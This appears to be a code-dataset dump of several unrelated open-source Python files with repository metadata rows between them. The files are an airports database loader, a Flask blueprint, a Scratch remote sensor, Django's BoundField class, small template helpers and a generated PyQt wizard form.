def test_create_vol_snapshot_diff_size_resize(self):
self.driver.create_volume(self.volume)
self.driver.create_snapshot(self.snapshot)
self.driver.create_volume_from_snapshot(
self.volume_clone, self.snapshot)
self.driver.delete_snapshot(self.snapshot)
self.driver.delete_volume(self.volume)
def test_create_vol_snapshot_diff_size_subclone(self):
self.driver.create_volume(self.volume)
self.driver.create_snapshot(self.snapshot)
self.driver.create_volume_from_snapshot(
self.volume_clone_large, self.snapshot)
self.driver.delete_snapshot(self.snapshot)
self.driver.delete_volume(self.volume)
|
apache-2.0
| -8,592,145,727,235,885,000 | 49.906292 | 79 | 0.563494 | false |
flopp/airports_map
|
airports/db.py
|
1
|
3270
|
import os
import random
import typing
from airports.airport import Airport, AirportType
from airports.airportstable import AirportsTable
from airports.download import download
from airports.runwaystable import RunwaysTable
from airports.wikipediahelper import get_wikipedia_articles
class DB:
def __init__(self) -> None:
self._airports: typing.Dict[str, Airport] = {}
self._large: typing.List[str] = []
self._medium: typing.List[str] = []
self._small: typing.List[str] = []
self._other: typing.List[str] = []
def load(self, cache_dir: str, reset_cache: bool) -> None:
airports_csv = os.path.join(cache_dir, "airports.csv")
runways_csv = os.path.join(cache_dir, "runways.csv")
wikipedia_json = os.path.join(cache_dir, "wikipedia_json")
if reset_cache:
for file_name in [airports_csv, runways_csv, wikipedia_json]:
if os.path.exists(file_name):
os.remove(file_name)
airports = AirportsTable(download("https://ourairports.com/data/airports.csv", airports_csv))
runways = RunwaysTable(download("https://ourairports.com/data/runways.csv", runways_csv))
articles = get_wikipedia_articles(wikipedia_json)
airports.add_wikipedia(articles)
airports.compute_bounds(runways.to_dict())
airports.check()
for airport in airports.good_airports():
self._airports[airport.icao_code()] = airport
if airport.airport_type() == AirportType.LARGE_AIRPORT:
self._large.append(airport.icao_code())
elif airport.airport_type() == AirportType.MEDIUM_AIRPORT:
self._medium.append(airport.icao_code())
elif airport.airport_type() == AirportType.SMALL_AIRPORT:
self._small.append(airport.icao_code())
else:
self._other.append(airport.icao_code())
def get_all_icaos(self) -> typing.List[str]:
return list(self._airports.keys())
def get(self, icao: str) -> typing.Optional[Airport]:
icao = icao.strip().upper()
if icao in self._airports:
return self._airports[icao]
return None
def get_random(self) -> Airport:
if random.choice([True, False]):
return self._airports[random.choice(self._large)]
if random.choice([True, False]):
return self._airports[random.choice(self._medium)]
if random.choice([True, False]):
return self._airports[random.choice(self._small)]
return self._airports[random.choice(list(self._airports.keys()))]
def get_random_list(self, count: int) -> typing.List[Airport]:
return random.sample(list(self._airports.values()), count)
def search(self, needle: str) -> typing.Optional[Airport]:
needle = needle.strip().upper()
for airport in self._airports.values():
if airport.matches_code(needle):
return airport
for airport in self._airports.values():
if airport.matches_name(needle):
return airport
for airport in self._airports.values():
if airport.matches_location(needle):
return airport
return None
|
mit
| -1,287,605,393,672,882,000 | 41.467532 | 101 | 0.62263 | false |
Vito2015/tcc3-portal
|
tcc3portal/tcc_frontend/__init__.py
|
1
|
1994
|
# coding:utf-8
"""
tcc3portal.tcc_frontend
~~~~~~~~~~~~~~~~~~~
tcc3portal tcc_frontend ui templates package.
:copyright: (c) 2015 by Vito.
:license: GNU, see LICENSE for more details.
"""
from flask import Blueprint, Flask, url_for, current_app
def tcc_frontend_find_resource(filename, cdn, local=True):
"""Resource finding function, also available in templates."""
cdns = current_app.extensions['tcc_frontend']['cdns']
resource_url = cdns[cdn].get_resource_url(filename)
return resource_url
def get_app_config(variable_name):
try:
return current_app.config[variable_name]
except KeyError:
return None
class StaticCDN(object):
"""A CDN that serves content from the local application.
:param static_endpoint: Endpoint to use.
"""
def __init__(self, static_endpoint='static'):
self.static_endpoint = static_endpoint
def get_resource_url(self, filename):
extra_args = {}
return url_for(self.static_endpoint, filename=filename, **extra_args)
class TccFrontend(object):
def __init__(self, app):
if app is not None:
self.init_app(app)
def init_app(self, app):
""" Init Flask app.
:type app: Flask
"""
blueprint = Blueprint('tcc_frontend',
__name__,
static_folder="static",
template_folder="templates",
static_url_path=app.static_url_path+'/tcc_frontend')
app.register_blueprint(blueprint)
app.jinja_env.globals['tcc_frontend_find_resource'] =\
tcc_frontend_find_resource
local = StaticCDN('tcc_frontend.static')
static = StaticCDN()
app.extensions['tcc_frontend'] = {
'cdns': {
'local': local,
'static': static,
},
}
app.jinja_env.globals['get_app_config'] = get_app_config
|
gpl-2.0
| 6,461,207,089,957,628,000 | 27.084507 | 82 | 0.575727 | false |
wendlers/scratch-pynetsense
|
example-src/WrappedRemoteSensor.py
|
1
|
2457
|
##
# This file is part of the Scratch Remote Sensor (SRS) Library project
#
# Copyright (C) 2012 Stefan Wendler <[email protected]>
#
# The SRS Library is free software; you can redistribute
# it and/or modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SRS Library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with the JSherpa firmware; if not, write to the Free
# Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
# 02111-1307 USA.
##
'''
This file is part of the Scratch Remote Sensor Library project
'''
import time
import socket
import logging
from scratch.remotesensor import RemoteSensor, DEFAULT_HOST, DEFAULT_PORT
class WrappedRemoteSensor(RemoteSensor):
'''
This example shows how to write a baic wrapped remote sensor. It reads
"/proc/meminfo" and parses out the values for "memtotal" and "memfree".
Each time one of this values changes, a sensor-update is send to the
server.
To start this sensor, pass it as a wrapper to the wrapper daemon:
source setenv.sh
python src/scratch/wrappers/daemon.py --foreground --loglevel DEBUG \
--wrap WrappedRemoteSensor#WrappedRemoteSensor start
'''
__args = None
# name used e.g. for heartbeat
name = "wrap"
def __init__(self, myArgs = {}):
'''
Create a new instance of the monitoring remote sensor.
@param myArgs arguments for the sensor: host and port.
'''
RemoteSensor.__init__(self, args = myArgs)
def worker(self):
'''
Read memory info from proc filesystem (memtotal and memfree). If the
value changed, send a sensor-update message to the server.
'''
try:
f = open('/proc/meminfo', 'r')
lines = f.readlines()
f.close()
changed = False
for l in lines:
w = l.split(':')
k = w[0].strip().lower()
v = int(w[1].strip().split(' ')[0])
# this are the only field we are interested in
if k in [ 'memtotal', 'memfree']:
if self.values.set(k, v):
changed = True
if changed:
self.bcastMsg('input-changed')
except Exception as e:
logging.error(e)
|
lgpl-2.1
| -1,918,675,807,934,093,300 | 26.606742 | 74 | 0.699634 | false |
letouriste001/SmartForest_2.0
|
python3.4Smartforest/lib/python3.4/site-packages/django/forms/boundfield.py
|
1
|
8691
|
from __future__ import unicode_literals
import datetime
from django.forms.utils import flatatt, pretty_name
from django.forms.widgets import Textarea, TextInput
from django.utils import six
from django.utils.encoding import (
force_text, python_2_unicode_compatible, smart_text,
)
from django.utils.html import conditional_escape, format_html, html_safe
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
__all__ = ('BoundField',)
UNSET = object()
@html_safe
@python_2_unicode_compatible
class BoundField(object):
"A Field plus data"
def __init__(self, form, field, name):
self.form = form
self.field = field
self.name = name
self.html_name = form.add_prefix(name)
self.html_initial_name = form.add_initial_prefix(name)
self.html_initial_id = form.add_initial_prefix(self.auto_id)
if self.field.label is None:
self.label = pretty_name(name)
else:
self.label = self.field.label
self.help_text = field.help_text or ''
self._initial_value = UNSET
def __str__(self):
"""Renders this field as an HTML widget."""
if self.field.show_hidden_initial:
return self.as_widget() + self.as_hidden(only_initial=True)
return self.as_widget()
def __iter__(self):
"""
Yields rendered strings that comprise all widgets in this BoundField.
This really is only useful for RadioSelect widgets, so that you can
iterate over individual radio buttons in a template.
"""
id_ = self.field.widget.attrs.get('id') or self.auto_id
attrs = {'id': id_} if id_ else {}
for subwidget in self.field.widget.subwidgets(self.html_name, self.value(), attrs):
yield subwidget
def __len__(self):
return len(list(self.__iter__()))
def __getitem__(self, idx):
# Prevent unnecessary reevaluation when accessing BoundField's attrs
# from templates.
if not isinstance(idx, six.integer_types + (slice,)):
raise TypeError
return list(self.__iter__())[idx]
@property
def errors(self):
"""
Returns an ErrorList for this field. Returns an empty ErrorList
if there are none.
"""
return self.form.errors.get(self.name, self.form.error_class())
def as_widget(self, widget=None, attrs=None, only_initial=False):
"""
Renders the field by rendering the passed widget, adding any HTML
attributes passed as attrs. If no widget is specified, then the
field's default widget will be used.
"""
if not widget:
widget = self.field.widget
if self.field.localize:
widget.is_localized = True
attrs = attrs or {}
if self.field.disabled:
attrs['disabled'] = True
auto_id = self.auto_id
if auto_id and 'id' not in attrs and 'id' not in widget.attrs:
if not only_initial:
attrs['id'] = auto_id
else:
attrs['id'] = self.html_initial_id
if not only_initial:
name = self.html_name
else:
name = self.html_initial_name
return force_text(widget.render(name, self.value(), attrs=attrs))
def as_text(self, attrs=None, **kwargs):
"""
Returns a string of HTML for representing this as an <input type="text">.
"""
return self.as_widget(TextInput(), attrs, **kwargs)
def as_textarea(self, attrs=None, **kwargs):
"Returns a string of HTML for representing this as a <textarea>."
return self.as_widget(Textarea(), attrs, **kwargs)
def as_hidden(self, attrs=None, **kwargs):
"""
Returns a string of HTML for representing this as an <input type="hidden">.
"""
return self.as_widget(self.field.hidden_widget(), attrs, **kwargs)
@property
def data(self):
"""
Returns the data for this BoundField, or None if it wasn't given.
"""
return self.field.widget.value_from_datadict(self.form.data, self.form.files, self.html_name)
def value(self):
"""
Returns the value for this BoundField, using the initial value if
the form is not bound or the data otherwise.
"""
if not self.form.is_bound:
data = self.form.initial.get(self.name, self.field.initial)
if callable(data):
if self._initial_value is not UNSET:
data = self._initial_value
else:
data = data()
# If this is an auto-generated default date, nix the
# microseconds for standardized handling. See #22502.
if (isinstance(data, (datetime.datetime, datetime.time)) and
not self.field.widget.supports_microseconds):
data = data.replace(microsecond=0)
self._initial_value = data
else:
data = self.field.bound_data(
self.data, self.form.initial.get(self.name, self.field.initial)
)
return self.field.prepare_value(data)
def label_tag(self, contents=None, attrs=None, label_suffix=None):
"""
Wraps the given contents in a <label>, if the field has an ID attribute.
contents should be 'mark_safe'd to avoid HTML escaping. If contents
aren't given, uses the field's HTML-escaped label.
If attrs are given, they're used as HTML attributes on the <label> tag.
label_suffix allows overriding the form's label_suffix.
"""
contents = contents or self.label
if label_suffix is None:
label_suffix = (self.field.label_suffix if self.field.label_suffix is not None
else self.form.label_suffix)
# Only add the suffix if the label does not end in punctuation.
# Translators: If found as last label character, these punctuation
# characters will prevent the default label_suffix to be appended to the label
if label_suffix and contents and contents[-1] not in _(':?.!'):
contents = format_html('{}{}', contents, label_suffix)
widget = self.field.widget
id_ = widget.attrs.get('id') or self.auto_id
if id_:
id_for_label = widget.id_for_label(id_)
if id_for_label:
attrs = dict(attrs or {}, **{'for': id_for_label})
if self.field.required and hasattr(self.form, 'required_css_class'):
attrs = attrs or {}
if 'class' in attrs:
attrs['class'] += ' ' + self.form.required_css_class
else:
attrs['class'] = self.form.required_css_class
attrs = flatatt(attrs) if attrs else ''
contents = format_html('<label{}>{}</label>', attrs, contents)
else:
contents = conditional_escape(contents)
return mark_safe(contents)
def css_classes(self, extra_classes=None):
"""
Returns a string of space-separated CSS classes for this field.
"""
if hasattr(extra_classes, 'split'):
extra_classes = extra_classes.split()
extra_classes = set(extra_classes or [])
if self.errors and hasattr(self.form, 'error_css_class'):
extra_classes.add(self.form.error_css_class)
if self.field.required and hasattr(self.form, 'required_css_class'):
extra_classes.add(self.form.required_css_class)
return ' '.join(extra_classes)
@property
def is_hidden(self):
"Returns True if this BoundField's widget is hidden."
return self.field.widget.is_hidden
@property
def auto_id(self):
"""
Calculates and returns the ID attribute for this BoundField, if the
associated Form has specified auto_id. Returns an empty string otherwise.
"""
auto_id = self.form.auto_id
if auto_id and '%s' in smart_text(auto_id):
return smart_text(auto_id) % self.html_name
elif auto_id:
return self.html_name
return ''
@property
def id_for_label(self):
"""
Wrapper around the field widget's `id_for_label` method.
Useful, for example, for focusing on this field regardless of whether
it has a single widget or a MultiWidget.
"""
widget = self.field.widget
id_ = widget.attrs.get('id') or self.auto_id
return widget.id_for_label(id_)
|
mit
| -1,490,052,181,959,970,800 | 37.286344 | 101 | 0.594638 | false |
AlexanderPease/viv
|
app/ui_methods.py
|
1
|
2070
|
# Just for ordinalizing the number of district
def ordinal(numb):
if type(numb) is str:
numb = int(float(numb))
if numb < 20: #determining suffix for < 20
if numb == 1:
suffix = 'st'
elif numb == 2:
suffix = 'nd'
elif numb == 3:
suffix = 'rd'
else:
suffix = 'th'
else: #determining suffix for > 20
tens = str(numb)
tens = tens[-2]
unit = str(numb)
unit = unit[-1]
if tens == "1":
suffix = "th"
else:
if unit == "1":
suffix = 'st'
elif unit == "2":
suffix = 'nd'
elif unit == "3":
suffix = 'rd'
else:
suffix = 'th'
return str(numb)+ suffix
def list_to_comma_delimited_string(list_arg):
"""
Takes a list and turns into comma-delimited string.
Used for turning Group.invited_emails into correct form for template display.
Args:
list: A list, ex: ["[email protected]", "[email protected]"] or Group.users
Returns
A string , ex: "[email protected], [email protected]"
"""
long_string = ""
for item in list_arg:
long_string += str(item) + ", "
long_string = long_string[0:-2] # Remove last ", "
return long_string
def get_domain(email):
"""
Returns just the domain name of an email address
Ex: reply.craigslist.com from [email protected]
"""
return email.split('@')[1]
def email_obscure(email):
"""
Obscures an email address
Args:
email: A string, ex: [email protected]
Returns
A string , ex: t*******@alexanderpease.com
"""
first_letter = email[0]
string_split = email.split('@')
obscured = ""
while len(obscured) < len(string_split[0])-1:
obscured = obscured + "*"
return first_letter + obscured + "@" + string_split[1]
def encode(text):
"""
For printing unicode characters
"""
return text.encode('utf-8')
|
gpl-3.0
| -6,869,473,597,955,327,000 | 24.256098 | 81 | 0.523671 | false |
danaukes/popupcad
|
popupcad/filetypes/genericshapebase.py
|
2
|
15733
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
from popupcad.geometry.vertex import ShapeVertex
import numpy
import qt.QtCore as qc
import qt.QtGui as qg
from dev_tools.enum import enum
import popupcad
class ShapeInvalid(Exception):
pass
class NotSimple(Exception):
pass
class GenericShapeBase(object):
display = ['construction', 'exterior', 'interiors']
editable = ['construction']
shapetypes = enum(
line='line',
polyline='polyline',
polygon='polygon',
circle='circle',
rect2point='rect2point')
deletable = []
def __init__(self,exterior,interiors,construction=False,test_shapely=False):
self.id = id(self)
self.exterior = exterior
self.interiors = interiors
self.construction = construction
# self.exterior = self.condition_loop(self.exterior)
# self.interiors = [self.condition_loop(interior) for interior in self.interiors]
self.exterior = self.remove_redundant_points(self.exterior)
self.interiors = [self.remove_redundant_points(interior) for interior in self.interiors]
def is_valid_bool(self):
try:
self.is_valid()
return True
except:
return False
def is_valid(self):
shapely = self.to_shapely(scaling = popupcad.csg_processing_scaling)
if not shapely.is_simple:
raise(NotSimple)
if not shapely.is_valid:
raise(ShapeInvalid)
@classmethod
def lastdir(cls):
return popupcad.lastshapedir
@classmethod
def setlastdir(cls, directory):
popupcad.lastshapedir = directory
def isValid(self):
notempty = self.len_exterior() > 0
return notempty
def copy_data(self, new_type, identical=True):
exterior = [vertex.copy(identical) for vertex in self.get_exterior()]
interiors = [[vertex.copy(identical) for vertex in interior]
for interior in self.get_interiors()]
new = new_type(exterior, interiors, self.is_construction())
if identical:
new.id = self.id
return new
def copy(self, identical=True):
return self.copy_data(type(self), identical)
def upgrade(self, identical=True):
exterior = [vertex.upgrade(identical) for vertex in self.get_exterior()]
interiors = [[vertex.upgrade(identical) for vertex in interior] for interior in self.get_interiors()]
new = type(self)(exterior, interiors, self.is_construction())
if identical:
new.id = self.id
return new
def get_exterior(self):
return self.exterior
def get_interiors(self):
return self.interiors
def is_construction(self):
try:
return self.construction
except AttributeError:
self.construction = False
return self.construction
def set_construction(self, test):
self.construction = test
def exteriorpoints(self, scaling=1):
return [vertex.getpos(scaling) for vertex in self.get_exterior()]
def interiorpoints(self, scaling=1):
return [[vertex.getpos(scaling) for vertex in interior]
for interior in self.get_interiors()]
def exteriorpoints_3d(self, z=0):
points = numpy.array([vertex.getpos() for vertex in self.get_exterior()])
size = list(points.shape)
size[1]+=1
points2 = numpy.zeros(size)
points2[:,:2] = points
points2[:,2] = z
return points2.tolist()
def interiorpoints_3d(self, z=0):
interiors2 = []
for interior in self.get_interiors():
points = numpy.array([vertex.getpos() for vertex in interior])
size = list(points.shape)
size[1]+=1
points2 = numpy.zeros(size)
points2[:,:2] = points
points2[:,2] = z
interiors2.append(points2.tolist())
return interiors2
def vertices(self):
vertices = self.get_exterior()[:]
[vertices.extend(interior) for interior in self.get_interiors()]
return vertices
def points(self, scaling=1):
return [vertex.getpos(scaling) for vertex in self.vertices()]
def segments_closed(self):
points = self.get_exterior()
segments = list(zip(points, points[1:] + points[:1]))
for points in self.get_interiors():
segments.extend(list(zip(points, points[1:] + points[:1])))
return segments
def segments_open(self):
points = self.get_exterior()
segments = list(zip(points[:-1], points[1:]))
for points in self.get_interiors():
segments.extend(list(zip(points[:-1], points[1:])))
return segments
def segmentpoints(self, scaling=1):
segments = self.segments()
segmentpoints = [
(point1.getpos(scaling),
point2.getpos(scaling)) for point1,
point2 in segments]
return segmentpoints
def painterpath(self):
exterior = self.exteriorpoints(scaling=popupcad.view_scaling)
interiors = self.interiorpoints(scaling=popupcad.view_scaling)
return self.gen_painterpath(exterior, interiors)
def gen_painterpath(self, exterior, interiors):
path = qg.QPainterPath()
return path
def properties(self):
from idealab_tools.propertyeditor import PropertyEditor
return PropertyEditor(self)
def addvertex_exterior(self, vertex, special=False):
self.exterior.append(vertex)
self.update_handles()
def addvertex_exterior_special(self, vertex, special=False):
if len(self.get_exterior()) > 2:
if special:
a = [v.getpos() for v in self.get_exterior()]
b = list(zip(a, a[1:] + a[:1]))
c = numpy.array(b)
d = numpy.array(vertex.getpos())
e = c - d
f = e.reshape(-1, 4)
g = (f**2).sum(1)
h = g.argmin()
self.insert_exterior_vertex(h + 1, vertex)
self.update_handles()
return
self.append_exterior_vertex(vertex)
self.update_handles()
def removevertex(self, vertex):
if vertex in self.exterior:
ii = self.exterior.index(vertex)
self.exterior.pop(ii)
for interior in self.interiors:
if vertex in self.interior:
ii = interior.index(vertex)
interior.pop(ii)
self.update_handles()
def checkedge(self, edge):
import popupcad.algorithms.points as points
for pt1, pt2 in zip(edge[:-1], edge[1:]):
if points.twopointsthesame(pt1, pt2, popupcad.distinguishable_number_difference):
raise Exception
@staticmethod
def _condition_loop(loop,round_vertices = False, test_rounded_vertices = True, remove_forward_redundancy=True, remove_loop_reduncancy=True,terminate_with_start = False,decimal_places = None):
if len(loop)>0:
if remove_forward_redundancy:
new_loop = [loop.pop(0)]
while not not loop:
v1 = new_loop[-1]
v2 = loop.pop(0)
if test_rounded_vertices:
equal = v1.rounded_is_equal(v2,decimal_places)
else:
equal = v1.identical(v2)
if not equal:
new_loop.append(v2)
else:
new_loop = loop[:]
v1 = new_loop[0]
v2 = new_loop[-1]
if test_rounded_vertices:
equal = v1.rounded_is_equal(v2,decimal_places)
else:
equal = v1.identical(v2)
if terminate_with_start:
if not equal:
new_loop.append(v1.copy(identical=False))
if remove_loop_reduncancy:
if equal:
new_loop.pop(-1)
if round_vertices:
new_loop = [item.round(decimal_places) for item in new_loop]
return new_loop
else:
return loop
def _condition(self,round_vertices = False, test_rounded_vertices = True, remove_forward_redundancy=True, remove_loop_reduncancy=True,terminate_with_start = False,decimal_places = None):
self.exterior = self._condition_loop(self.exterior,round_vertices = False, test_rounded_vertices = True, remove_forward_redundancy=True, remove_loop_reduncancy=True,terminate_with_start = False,decimal_places = None)
self.interiors = [self._condition_loop(interior,round_vertices = False, test_rounded_vertices = True, remove_forward_redundancy=True, remove_loop_reduncancy=True,terminate_with_start = False,decimal_places = None) for interior in self.interiors]
@classmethod
def condition_loop(cls,loop):
return cls._condition_loop(loop)
# def condition(self):
# self.exterior = self.condition_loop(self.exterior)
# self.interiors = [self.condition_loop(interior) for interior in self.interiors]
@classmethod
def gen_from_point_lists(cls, exterior_p, interiors_p, **kwargs):
exterior = [ShapeVertex(point) for point in exterior_p]
interiors= [[ShapeVertex(point) for point in interior] for interior in interiors_p]
return cls(exterior, interiors, **kwargs)
def genInteractiveVertices(self):
try:
return self._exteriorhandles, self._interiorhandles
except AttributeError:
self.update_handles()
return self._exteriorhandles, self._interiorhandles
def update_handles(self):
try:
for handle in self._handles:
handle.harddelete()
except AttributeError:
pass
exterior = [vertex.gen_interactive() for vertex in self.get_exterior()]
interiors = [[vertex.gen_interactive() for vertex in interior] for interior in self.get_interiors()]
handles = exterior[:]
[handles.extend(interior) for interior in interiors]
self._exteriorhandles = exterior
self._interiorhandles = interiors
self._handles = handles
def len_exterior(self):
return len(self.get_exterior())
def get_handles(self):
try:
return self._handles
except AttributeError:
self.update_handles()
return self._handles
def get_exterior_handles(self):
try:
return self._exteriorhandles
except AttributeError:
self.update_handles()
return self._exteriorhandles
def triangles3(self):
return []
@staticmethod
def generateQPolygon(points):
poly = qg.QPolygonF([qc.QPointF(*(point))
for point in numpy.array(points)])
return poly
def is_equal(self, other):
if isinstance(self, type(other)):
if len(
self.get_exterior()) == len(
other.get_exterior()) and len(
self.get_interiors()) == len(
other.get_interiors()):
for point1, point2 in zip(
self.get_exterior(), other.get_exterior()):
if not point1.is_equal(point2, popupcad.distinguishable_number_difference):
return False
for interior1, interior2 in zip(
self.get_interiors(), other.get_interiors()):
if len(interior1) != len(interior2):
return False
for point1, point2 in zip(interior1, interior2):
if not point1.is_equal(point2, popupcad.distinguishable_number_difference):
return False
return True
return False
def scale(self, m):
[item.scale(m) for item in self.get_exterior()]
[item.scale(m) for interior in self.get_interiors() for item in interior]
def shift(self, dxdy):
[item.shift(dxdy) for item in self.get_exterior()]
[item.shift(dxdy) for interior in self.get_interiors()
for item in interior]
def transform(self, T):
exteriorpoints = (T.dot(numpy.array(self.exteriorpoints_3d(z=1)).T)).T[:,:2].tolist()
interiorpoints = [(T.dot(numpy.array(interior).T)).T[:,:2].tolist() for interior in self.interiorpoints_3d(z=1)]
return self.gen_from_point_lists(exteriorpoints,interiorpoints)
def constrained_shift(self, dxdy, constraintsystem):
a = [(item, dxdy) for item in self.get_exterior()]
a.extend([(item, dxdy) for interior in self.get_interiors() for item in interior])
constraintsystem.constrained_shift(a)
def flip(self):
self.exterior = self.get_exterior()[::-1]
self.interiors = [interior[::-1] for interior in self.get_interiors()]
def hollow(self):
return [self]
def fill(self):
return [self]
def insert_exterior_vertex(self, ii, vertex):
self.exterior.insert(ii, vertex)
def append_exterior_vertex(self, vertex):
self.exterior.append(vertex)
def output_dxf(self,model_space,layer = None):
csg = self.to_shapely(scaling = popupcad.csg_processing_scaling)
new = popupcad.algorithms.csg_shapely.to_generic(csg)
return new.output_dxf(model_space,layer)
def __lt__(self,other):
return self.exteriorpoints()[0]<other.exteriorpoints()[0]
def find_minimal_enclosing_circle(self):
from popupcad.algorithms.minimal_enclosing_circle import numerical_stable_circle
return numerical_stable_circle(self.exteriorpoints)
#Gets the center
def get_center(self):
'''Retrieves the center point of the shape'''
points = self.exteriorpoints()
x_values = [point[0]/popupcad.SI_length_scaling for point in points]
y_values = [point[1]/popupcad.SI_length_scaling for point in points]
x = float(sum(x_values)) / len(x_values)
y = float(sum(y_values)) / len(y_values)
return (x, y)
def exterior_points_from_center(self):
'''Retrieves the exterior points relative to the center'''
center = self.get_center()
points = self.exteriorpoints()
x_values = [point[0]/popupcad.SI_length_scaling - center[0] for point in points]
y_values = [point[1]/popupcad.SI_length_scaling - center[1] for point in points]
return list(zip(x_values, y_values))
@classmethod
def remove_redundant_points(cls, points, scaling=1,loop_test = True):
newpoints = []
if len(points)>0:
points = points[:]
newpoints.append(points.pop(0))
while not not points:
newpoint = points.pop(0)
if not popupcad.algorithms.points.twopointsthesame(newpoints[-1].getpos(scaling),newpoint.getpos(scaling),popupcad.distinguishable_number_difference):
if len(points)==0 and loop_test:
if not popupcad.algorithms.points.twopointsthesame(newpoints[0].getpos(scaling),newpoint.getpos(scaling),popupcad.distinguishable_number_difference):
newpoints.append(newpoint)
else:
newpoints.append(newpoint)
return newpoints
|
mit
| 9,166,630,827,800,457,000 | 35.590698 | 253 | 0.59372 | false |
matrumz/RPi_Custom_Files
|
Printing/hplip-3.15.2/ui/setupform_base.py
|
1
|
26342
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/setupform_base.ui'
#
# Created: Thu Sep 20 11:45:16 2007
# by: The PyQt User Interface Compiler (pyuic) 3.17
#
# WARNING! All changes made in this file will be lost!
from qt import *
class SetupForm_base(QWizard):
def __init__(self,parent = None,name = None,modal = 0,fl = 0):
QWizard.__init__(self,parent,name,modal,fl)
if not name:
self.setName("SetupForm_base")
self.ConnectionPage = QWidget(self,"ConnectionPage")
ConnectionPageLayout = QGridLayout(self.ConnectionPage,1,1,11,6,"ConnectionPageLayout")
self.connectionTypeButtonGroup = QButtonGroup(self.ConnectionPage,"connectionTypeButtonGroup")
self.connectionTypeButtonGroup.setColumnLayout(0,Qt.Vertical)
self.connectionTypeButtonGroup.layout().setSpacing(6)
self.connectionTypeButtonGroup.layout().setMargin(11)
connectionTypeButtonGroupLayout = QGridLayout(self.connectionTypeButtonGroup.layout())
connectionTypeButtonGroupLayout.setAlignment(Qt.AlignTop)
self.usbRadioButton = QRadioButton(self.connectionTypeButtonGroup,"usbRadioButton")
connectionTypeButtonGroupLayout.addWidget(self.usbRadioButton,0,0)
self.netRadioButton = QRadioButton(self.connectionTypeButtonGroup,"netRadioButton")
connectionTypeButtonGroupLayout.addWidget(self.netRadioButton,1,0)
self.parRadioButton = QRadioButton(self.connectionTypeButtonGroup,"parRadioButton")
connectionTypeButtonGroupLayout.addWidget(self.parRadioButton,2,0)
ConnectionPageLayout.addMultiCellWidget(self.connectionTypeButtonGroup,1,1,0,1)
spacer12 = QSpacerItem(20,120,QSizePolicy.Minimum,QSizePolicy.Expanding)
ConnectionPageLayout.addItem(spacer12,2,0)
spacer18 = QSpacerItem(321,20,QSizePolicy.Expanding,QSizePolicy.Minimum)
ConnectionPageLayout.addItem(spacer18,3,1)
self.searchFiltersPushButton2 = QPushButton(self.ConnectionPage,"searchFiltersPushButton2")
ConnectionPageLayout.addWidget(self.searchFiltersPushButton2,3,0)
self.addPage(self.ConnectionPage,QString(""))
self.ProbedDevicesPage = QWidget(self,"ProbedDevicesPage")
ProbedDevicesPageLayout = QGridLayout(self.ProbedDevicesPage,1,1,11,6,"ProbedDevicesPageLayout")
self.probedDevicesListView = QListView(self.ProbedDevicesPage,"probedDevicesListView")
self.probedDevicesListView.setAllColumnsShowFocus(1)
ProbedDevicesPageLayout.addMultiCellWidget(self.probedDevicesListView,1,1,0,3)
self.searchFiltersPushButton = QPushButton(self.ProbedDevicesPage,"searchFiltersPushButton")
ProbedDevicesPageLayout.addWidget(self.searchFiltersPushButton,2,0)
self.probeHeadingTextLabel = QLabel(self.ProbedDevicesPage,"probeHeadingTextLabel")
ProbedDevicesPageLayout.addMultiCellWidget(self.probeHeadingTextLabel,0,0,0,3)
self.manualFindPushButton = QPushButton(self.ProbedDevicesPage,"manualFindPushButton")
ProbedDevicesPageLayout.addWidget(self.manualFindPushButton,2,1)
spacer13 = QSpacerItem(101,20,QSizePolicy.Expanding,QSizePolicy.Minimum)
ProbedDevicesPageLayout.addItem(spacer13,2,2)
self.probeUpdatePushButton = QPushButton(self.ProbedDevicesPage,"probeUpdatePushButton")
ProbedDevicesPageLayout.addWidget(self.probeUpdatePushButton,2,3)
self.addPage(self.ProbedDevicesPage,QString(""))
self.PPDPage = QWidget(self,"PPDPage")
PPDPageLayout = QGridLayout(self.PPDPage,1,1,11,6,"PPDPageLayout")
self.ppdListView = QListView(self.PPDPage,"ppdListView")
self.ppdListView.addColumn(self.__tr("PPD File"))
self.ppdListView.addColumn(self.__tr("Description"))
self.ppdListView.setAllColumnsShowFocus(1)
PPDPageLayout.addMultiCellWidget(self.ppdListView,1,1,0,2)
self.otherPPDPushButton = QPushButton(self.PPDPage,"otherPPDPushButton")
self.otherPPDPushButton.setEnabled(1)
PPDPageLayout.addWidget(self.otherPPDPushButton,2,0)
spacer9 = QSpacerItem(320,20,QSizePolicy.Expanding,QSizePolicy.Minimum)
PPDPageLayout.addItem(spacer9,2,1)
self.ppdDefaultsPushButton = QPushButton(self.PPDPage,"ppdDefaultsPushButton")
PPDPageLayout.addWidget(self.ppdDefaultsPushButton,2,2)
self.textLabel1_5 = QLabel(self.PPDPage,"textLabel1_5")
self.textLabel1_5.setAlignment(QLabel.WordBreak | QLabel.AlignVCenter)
PPDPageLayout.addMultiCellWidget(self.textLabel1_5,0,0,0,2)
self.addPage(self.PPDPage,QString(""))
self.PrinterNamePage = QWidget(self,"PrinterNamePage")
PrinterNamePageLayout = QGridLayout(self.PrinterNamePage,1,1,11,6,"PrinterNamePageLayout")
self.groupBox4 = QGroupBox(self.PrinterNamePage,"groupBox4")
self.groupBox4.setColumnLayout(0,Qt.Vertical)
self.groupBox4.layout().setSpacing(6)
self.groupBox4.layout().setMargin(11)
groupBox4Layout = QGridLayout(self.groupBox4.layout())
groupBox4Layout.setAlignment(Qt.AlignTop)
self.printerNameLineEdit = QLineEdit(self.groupBox4,"printerNameLineEdit")
self.printerNameLineEdit.setMaxLength(50)
groupBox4Layout.addWidget(self.printerNameLineEdit,0,1)
self.defaultPrinterNamePushButton = QPushButton(self.groupBox4,"defaultPrinterNamePushButton")
self.defaultPrinterNamePushButton.setEnabled(0)
groupBox4Layout.addWidget(self.defaultPrinterNamePushButton,0,2)
